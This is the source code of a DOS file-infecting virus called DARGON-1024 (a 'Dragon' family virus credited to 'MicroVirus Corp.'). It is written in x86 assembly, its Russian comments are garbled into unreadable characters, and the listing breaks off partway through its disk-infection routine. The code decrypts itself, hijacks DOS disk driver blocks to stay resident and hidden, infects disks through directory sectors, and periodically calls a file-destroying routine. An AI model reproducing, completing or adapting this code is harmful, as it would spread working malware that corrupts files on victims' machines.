2022-08-21 09:07:57 +00:00
|
|
|
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
|
|
|
|
|
|
; <20> MicroVirus Corp. <20><><EFBFBD>
|
|
|
|
|
|
; <20> Author: anti <20><><EFBFBD>
|
|
|
|
|
|
; <20> VIRUS FAMILY: Dragon <20><><EFBFBD>
|
|
|
|
|
|
; <20> VERSION: 1.0 <20><><EFBFBD>
|
|
|
|
|
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ<EFBFBD><CDBC>
|
|
|
|
|
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
|
|
|
|
|
|
; <20> Name: DARGON-1024 <20> Target: EXE, COM <20><><EFBFBD>
|
|
|
|
|
|
; <20> Rating: Dangerous <20> Stealth: Yes <20><><EFBFBD>
|
|
|
|
|
|
; <20> Tsr: Yes <20> Phantom: Yes <20><><EFBFBD>
|
|
|
|
|
|
; <20> Arming: Yes <20> Danger(6): 4 <20><><EFBFBD>
|
|
|
|
|
|
; <20> Attac Speed: Very Fast <20> Clock: No <20><><EFBFBD>
|
|
|
|
|
|
; <20> Text Strings: Yes <20> Echo: Yes <20><><EFBFBD>
|
|
|
|
|
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ķ<EFBFBD><C4B6>
|
|
|
|
|
|
; <20> Find Next Target: SCANING ROOT DIRECTORY <20><><EFBFBD>
|
|
|
|
|
|
; <20> Other viruses: none <20><><EFBFBD>
|
|
|
|
|
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ<EFBFBD><CDBC>
|
|
|
|
|
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
code segment para 'code'
|
|
|
|
|
|
assume cs:code,ds:code
|
|
|
|
|
|
org 100h
|
|
|
|
|
|
|
|
|
|
|
|
dragon proc
|
|
|
|
|
|
mov di,offset Begin ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E0AEA2> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
mov cx,1010
|
|
|
|
|
|
|
|
|
|
|
|
mov ax,00h ;<3B><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E0AEA2> (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
|
|
|
|
|
|
Decode: xor word ptr [di],ax
|
|
|
|
|
|
inc di
|
|
|
|
|
|
loop Decode
|
|
|
|
|
|
|
|
|
|
|
|
Begin: mov ah,30h ;<3B><><EFBFBD><EFBFBD><EFBFBD>訢<EFBFBD><E8A8A2><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
int 21h ;DOS
|
|
|
|
|
|
|
|
|
|
|
|
cmp al,04h ;DOS 4.x+ : SI = 0
|
|
|
|
|
|
sbb si,si ;DOS 2/3 : SI = -1
|
|
|
|
|
|
|
|
|
|
|
|
mov ah,52h ;<3B><><EFBFBD><EFBFBD><EFBFBD>訢<EFBFBD><E8A8A2><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> DOS List of
|
|
|
|
|
|
int 21h ;List <20> ॣ<><E0A5A3><EFBFBD><EFBFBD><EFBFBD> ES:BX
|
|
|
|
|
|
|
|
|
|
|
|
lds bx,es:[bx] ;DS:BX 㪠<>뢠<EFBFBD><EBA2A0> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> DPB
|
|
|
|
|
|
;( Drive Parametr Block)
|
|
|
|
|
|
search: mov ax,[bx+si+15h] ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ᥣ<><E1A5A3><EFBFBD><EFBFBD><EFBFBD> <20>ࠩ<EFBFBD><E0A0A9><EFBFBD><EFBFBD>
|
|
|
|
|
|
cmp ax,70h ;<3B><><EFBFBD> <20>ࠩ<EFBFBD><E0A0A9><EFBFBD> <20><>᪠?
|
|
|
|
|
|
jne next ;<3B> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <><E1ABA5><EFBFBD>騩 <20>ࠩ<EFBFBD>.
|
|
|
|
|
|
xchg ax,cx ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ᥣ<><E1A5A3><EFBFBD><EFBFBD> <20> CX
|
|
|
|
|
|
mov [bx+si+18h],byte ptr -1
|
|
|
|
|
|
mov di,[bx+si+13h] ;<3B><><EFBFBD>࠭塞 ᬥ饭<E1ACA5><E9A5AD> <20>ࠩ<EFBFBD><E0A0A9><EFBFBD><EFBFBD>
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD> <20>ਣ<EFBFBD><E0A8A3><EFBFBD><EFBFBD>쭮<EFBFBD><ECADAE> <20>ࠩ<EFBFBD><E0A0A9><EFBFBD><EFBFBD>
|
|
|
|
|
|
;<3B> CX:DI
|
|
|
|
|
|
|
|
|
|
|
|
mov [bx+si+13h],offset header ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> DPB <20><><EFBFBD> ᮡ<>⢥<EFBFBD><E2A2A5>.
|
|
|
|
|
|
mov [bx+si+15h],cs ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>ன<EFBFBD>⢠
|
|
|
|
|
|
next: lds bx,[bx+si+19h] ;<3B><><EFBFBD><EFBFBD><EFBFBD> <><E1ABA5><EFBFBD>騩 <20>ࠩ<EFBFBD><E0A0A9><EFBFBD>
|
|
|
|
|
|
cmp bx,-1 ;<3B><><EFBFBD> <20><><EFBFBD><E1ABA5><EFBFBD><EFBFBD> <20>ࠩ<EFBFBD><E0A0A9><EFBFBD>?
|
|
|
|
|
|
jne search ;<3B> <20><><EFBFBD> <20><EFBFBD><E0AEA2><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
mov ds,cx ;DS : ᥣ<><E1A5A3><EFBFBD><EFBFBD> <20>ਣ<EFBFBD><E0A8A3><EFBFBD><EFBFBD>쭮<EFBFBD><ECADAE>
|
|
|
|
|
|
;<3B>ࠩ<EFBFBD><E0A0A9><EFBFBD><EFBFBD>
|
|
|
|
|
|
les ax,[di+6] ;ES : <20><><EFBFBD>楤<EFBFBD><E6A5A4><EFBFBD> <20><><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD>
|
|
|
|
|
|
;AX : <20><><EFBFBD>楤<EFBFBD><E6A5A4><EFBFBD> <20><><EFBFBD><EFBFBD>⥣<EFBFBD><E2A5A3>
|
|
|
|
|
|
|
|
|
|
|
|
mov word ptr cs:Strat,ax ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
mov word ptr cs:Intr,es ;<3B><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>襣<EFBFBD> <20>ᯮ<EFBFBD>짮<EFBFBD><ECA7AE><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
push cs
|
|
|
|
|
|
pop es
|
|
|
|
|
|
|
|
|
|
|
|
mov bx,128 ;<3B><EFBFBD><E1A2AE><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD>
|
|
|
|
|
|
mov ah,4ah ;2048 <20><><EFBFBD><EFBFBD>
|
|
|
|
|
|
int 21h
|
|
|
|
|
|
|
|
|
|
|
|
mov ax,cs ;AX : <20><><EFBFBD><EFBFBD><EFBFBD> <20><>襣<EFBFBD> MCB
|
|
|
|
|
|
dec ax
|
|
|
|
|
|
mov es,ax
|
|
|
|
|
|
mov word ptr es:[01h],08h ;<3B><>᪨<EFBFBD>㥬<EFBFBD><E3A5AC> <20><><EFBFBD> DOS
|
|
|
|
|
|
|
|
|
|
|
|
push cs
|
|
|
|
|
|
pop ds
|
|
|
|
|
|
|
|
|
|
|
|
mov byte ptr Drive+1,-1 ;<3B><><EFBFBD><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0> <20><><EFBFBD><EFBFBD><EFBFBD> <20><>᪠
|
|
|
|
|
|
|
|
|
|
|
|
mov dx,offset File ;<3B><>ࠦ<EFBFBD><E0A0A6><EFBFBD> ⥪<>騩 <20><>⮫<EFBFBD><E2AEAB>
|
|
|
|
|
|
mov ah,3dh ;<3B><>᪠ C:
|
|
|
|
|
|
int 21h
|
|
|
|
|
|
|
|
|
|
|
|
mov bx,ds:[2ch] ;<3B><EFBFBD><E1A2AE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
mov es,bx ;PSP
|
|
|
|
|
|
mov ah,49h
|
|
|
|
|
|
int 21h
|
|
|
|
|
|
xor ax,ax
|
|
|
|
|
|
test bx,bx ;BX = 0?
|
|
|
|
|
|
jz boot ;<3B> <20><>, <20><> <20><> <20><>ࠧ<EFBFBD><E0A0A7><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
mov di,1 ;<3B> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>⨫<EFBFBD> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD><EFBFBD> 䠩<>
|
|
|
|
|
|
seek: dec di ;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> DOS
|
|
|
|
|
|
scasw
|
|
|
|
|
|
jne seek
|
|
|
|
|
|
lea dx,[di+2] ;SI 㪠<>뢠<EFBFBD><EBA2A0> <20><> <20><><EFBFBD> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
push es ;䠩<><E4A0A9>
|
|
|
|
|
|
jmp short exec
|
|
|
|
|
|
|
|
|
|
|
|
boot: mov es,ds:[16h] ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> PSP
|
|
|
|
|
|
mov bx,es:[16h]
|
|
|
|
|
|
dec bx ;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> MCB
|
|
|
|
|
|
xor dx,dx
|
|
|
|
|
|
push es
|
|
|
|
|
|
|
|
|
|
|
|
exec: push bx ;<3B><>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><>ࠬ<EFBFBD><E0A0AC>
|
|
|
|
|
|
mov bx,offset param ;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>ப<EFBFBD>
|
|
|
|
|
|
mov [bx+4],cs ;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><>ࢮ<EFBFBD><E0A2AE> FCB
|
|
|
|
|
|
mov [bx+8],cs ;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>ண<EFBFBD> FCB
|
|
|
|
|
|
mov [bx+12],cs
|
|
|
|
|
|
pop ds
|
|
|
|
|
|
|
|
|
|
|
|
mov ax,4b00h ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD><EFBFBD> 䠩<>
|
|
|
|
|
|
int 21h
|
|
|
|
|
|
mov ah,4ch ;<3B><><EFBFBD><EFBFBD><EFBFBD> <20> DOS
|
|
|
|
|
|
int 21h
|
|
|
|
|
|
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;<3B> *** Device Driver's Strategy Block *** <20>
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
Strategy: pushf
|
|
|
|
|
|
push ax
|
|
|
|
|
|
push bx
|
|
|
|
|
|
push cx
|
|
|
|
|
|
push dx
|
|
|
|
|
|
push si
|
|
|
|
|
|
push di
|
|
|
|
|
|
push ds
|
|
|
|
|
|
|
|
|
|
|
|
push es
|
|
|
|
|
|
pop ds
|
|
|
|
|
|
|
|
|
|
|
|
mov ah,[bx+2] ;AH : <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> DOS
|
|
|
|
|
|
cmp ah,04h ;<3B><><EFBFBD><EFBFBD> ( <20><>⥭<EFBFBD><E2A5AD>)?
|
|
|
|
|
|
je Work ;<3B> <20><><EFBFBD> - <20>த<EFBFBD><E0AEA4><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E0AEA2><EFBFBD><EFBFBD>
|
|
|
|
|
|
cmp ah,08h ;<3B>뢮<EFBFBD> ( <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)?
|
|
|
|
|
|
je Work ;<3B> <20><><EFBFBD> - <20>த<EFBFBD><E0AEA4><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E0AEA2><EFBFBD><EFBFBD>
|
|
|
|
|
|
cmp ah,09h ;<3B>뢮<EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><E0AEAB>?
|
|
|
|
|
|
je Work ;<3B> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
jmp FuckOut
|
|
|
|
|
|
|
|
|
|
|
|
Work: call OrigDrive ;<3B><>ࠡ<EFBFBD><E0A0A1><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> DOS
|
|
|
|
|
|
call CheckDrive ;<3B><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>?
|
|
|
|
|
|
je CheckData ;<3B><> - <20><>ࠧ<EFBFBD><E0A0A7><EFBFBD> <20><><EFBFBD>
|
|
|
|
|
|
call InfectDisk
|
|
|
|
|
|
|
|
|
|
|
|
CheckData: mov ax,[bx+14h] ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><>⥭<EFBFBD><E2A5AD> <20><><EFBFBD>⥬<EFBFBD><E2A5AC><EFBFBD>
|
|
|
|
|
|
FirstSector: cmp ax,10h ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>᪠?
|
|
|
|
|
|
jb FuckOut ;<3B><> - <20><><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
LastSector: cmp ax,21h
|
|
|
|
|
|
ja FuckFile
|
|
|
|
|
|
|
|
|
|
|
|
call ChangeSector ;<3B><>ࠧ<EFBFBD><E0A0A7><EFBFBD> ᥪ<><E1A5AA><EFBFBD> <20><>⮫<EFBFBD><E2AEAB><EFBFBD>
|
|
|
|
|
|
jmp Exit ;<3B><><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
FuckFile: mov ah,es:[bx+2] ;AH : <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> DOS
|
|
|
|
|
|
cmp ah,08h ;<3B>뢮<EFBFBD> (<28><>⥭<EFBFBD><E2A5AD>)?
|
|
|
|
|
|
je GoAhead ;<3B><EFBFBD><E0AEA2><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
cmp ah,09h ;<3B>뢮<EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><E0AEAB>?
|
|
|
|
|
|
jne FuckOut ;<3B><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
GoAhead: mov ax,es:[bx+14h] ;<3B><>⥭<EFBFBD><E2A5AD> <20><><EFBFBD>⥬<EFBFBD><E2A5AC><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
cmp ax,word ptr cs:LastSector+1 ;<3B><>᪠?
|
|
|
|
|
|
jb FuckOut ;<3B><> - <20><><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
inc cs:RecNum ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
cmp cs:RecNum,64h ;<3B><><EFBFBD> 100 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>?
|
|
|
|
|
|
jne FuckOut ;<3B><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
mov cs:RecNum,00h ;<3B><><EFBFBD>㫨<EFBFBD><E3ABA8> <20><> <20><><EFBFBD><EFBFBD>ᥩ
|
|
|
|
|
|
call DestroyFile ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
FuckOut: call OrigDrive ;<3B>맢<EFBFBD><EBA7A2><EFBFBD> <20>ਣ<EFBFBD><E0A8A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>ࠩ<EFBFBD><E0A0A9><EFBFBD>
|
|
|
|
|
|
Exit: pop ds
|
|
|
|
|
|
pop di
|
|
|
|
|
|
pop si
|
|
|
|
|
|
pop dx
|
|
|
|
|
|
pop cx
|
|
|
|
|
|
pop bx
|
|
|
|
|
|
pop ax
|
|
|
|
|
|
popf
|
|
|
|
|
|
Inter: retf ;<3B><><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;<3B> *** Infect Disk *** <20>
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
InfectDisk proc near
|
|
|
|
|
|
cld ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
mov cx,0bh ;<3B> <20>⥪<EFBFBD>
|
|
|
|
|
|
mov si,bx
|
|
|
|
|
|
Save: lodsw
|
|
|
|
|
|
push ax
|
|
|
|
|
|
loop Save
|
|
|
|
|
|
|
|
|
|
|
|
mov word ptr [bx+0eh],offset VirusEnd ;<3B><>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD> <>
|
|
|
|
|
|
mov word ptr [bx+10h],cs ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><>⥭<EFBFBD><E2A5AD> <20> <20><>᪠
|
|
|
|
|
|
mov byte ptr [bx+2],02h ;<3B><><EFBFBD><EFBFBD><EFBFBD>訢<EFBFBD><E8A8A2><EFBFBD> BPB
|
|
|
|
|
|
call OrigDrive ;( BIOS Parametr Block)
|
|
|
|
|
|
|
|
|
|
|
|
lds si,[bx+12h] ;DS:SI : <20><><EFBFBD><EFBFBD><EFBFBD> BPB
|
|
|
|
|
|
|
|
|
|
|
|
mov ax,[si+11] ;AX : <20><> ᥪ<><E1A5AA> FAT
|
|
|
|
|
|
mov word ptr cs:FatSec1+3,ax
|
|
|
|
|
|
push ax
|
|
|
|
|
|
dec ax
|
|
|
|
|
|
mov cx,[si] ;CX : <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ᥪ<><E1A5AA><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
mul cx ;AX : ࠧ<><E0A0A7><EFBFBD> FAT <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
mov word ptr cs:FatSecSize+2,ax
|
|
|
|
|
|
pop ax
|
|
|
|
|
|
shl ax,01h
|
|
|
|
|
|
add ax,[si+3] ;AX : <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>⠫<EFBFBD><E2A0AB><EFBFBD>
|
|
|
|
|
|
mov word ptr cs:FirstSector+1,ax
|
|
|
|
|
|
push ax
|
|
|
|
|
|
|
|
|
|
|
|
xor dx,dx
|
|
|
|
|
|
mov ax,[si]
|
|
|
|
|
|
mov word ptr cs:Bytes+1,ax
|
|
|
|
|
|
mov cx,20h
|
|
|
|
|
|
div cx
|
|
|
|
|
|
mov cx,ax
|
|
|
|
|
|
mov ax,[si+6] ;AX : ࠧ<><E0A0A7><EFBFBD> <20><>⠫<EFBFBD><E2A0AB><EFBFBD>
|
|
|
|
|
|
div cx
|
|
|
|
|
|
|
|
|
|
|
|
pop di
|
|
|
|
|
|
add di,ax ;DI : <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ᥪ<><E1A5AA><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
mov word ptr cs:LastSector+1,di ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
mov ax,[si+8] ;AX : <20><>饥 <20><> ᥪ<><E1A5AA>
|
|
|
|
|
|
push ax
|
|
|
|
|
|
xor cx,cx
|
|
|
|
|
|
mov cl,[si+2] ;CX : <20><> ᥪ<><E1A5AA> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
mov word ptr cs:Cluster+1,cx
|
|
|
|
|
|
|
|
|
|
|
|
sub ax,cx ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> ᥪ<><E1A5AA> <20><>
|
|
|
|
|
|
